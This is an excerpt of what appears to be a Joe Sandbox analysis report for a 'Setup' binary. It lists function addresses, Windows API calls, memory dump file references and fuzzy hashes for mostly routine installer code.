Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
@, xrefs: 00404B90
N, xrefs: 00404C06
M, xrefs: 00404B43

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@%F, xrefs: 00404674
@rD, xrefs: 00404610
A, xrefs: 00404636
82D, xrefs: 004046DB

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
